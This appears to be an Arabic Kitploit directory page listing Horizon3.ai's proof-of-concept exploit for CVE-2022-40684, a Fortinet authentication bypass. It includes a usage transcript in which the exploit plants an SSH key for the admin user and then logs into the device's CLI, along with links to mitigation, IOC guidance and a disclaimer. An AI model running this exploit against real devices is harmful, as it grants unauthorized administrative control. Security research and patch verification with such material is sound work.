Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-40684 — استغلال لإثبات المفهوم لثغرة CVE-2022-40684 التي تؤثر على Fortinet FortiOS وFortiProxy وFortiSwitchManager | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2022-40684
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
GitHubhorizon3ai/cve-2022-40684

CVE-2022-40684

استغلال لإثبات المفهوم لثغرة CVE-2022-40684 التي تؤثر على Fortinet FortiOS وFortiProxy وFortiSwitchManager

عرض المستودع
35890منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-40684

إثبات المفهوم (POC) لثغرة CVE-2022-40684 التي تؤثر على أجهزة Fortinet FortiOS وFortiProxy وFortiSwitchManager.

تحليل فني

يمكن العثور على تحليل فني للسبب الجذري للثغرة على مدونتنا: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

مؤشرات الاختراق

لتحليل سجلات Fortinet بحثًا عن مؤشرات الاختراق ومعرفة كيفية تفعيل سجلات أعمق، راجع مدونة IOC الخاصة بنا: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

ملخص

يستغل إثبات المفهوم هذا ثغرة تجاوز المصادقة لتعيين مفتاح SSH للمستخدم المحدد.

الاستخدام

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

التخفيف

قم بالتحديث إلى أحدث إصدار أو خفّف من الثغرة باتباع التعليمات الواردة في Fortinet PSIRT

  • https://www.fortiguard.com/psirt/FG-IR-22-377

تابع فريق Horizon3.ai Attack على تويتر للاطلاع على أحدث الأبحاث الأمنية:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا عند التصريح بذلك صراحةً. القائمون على المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة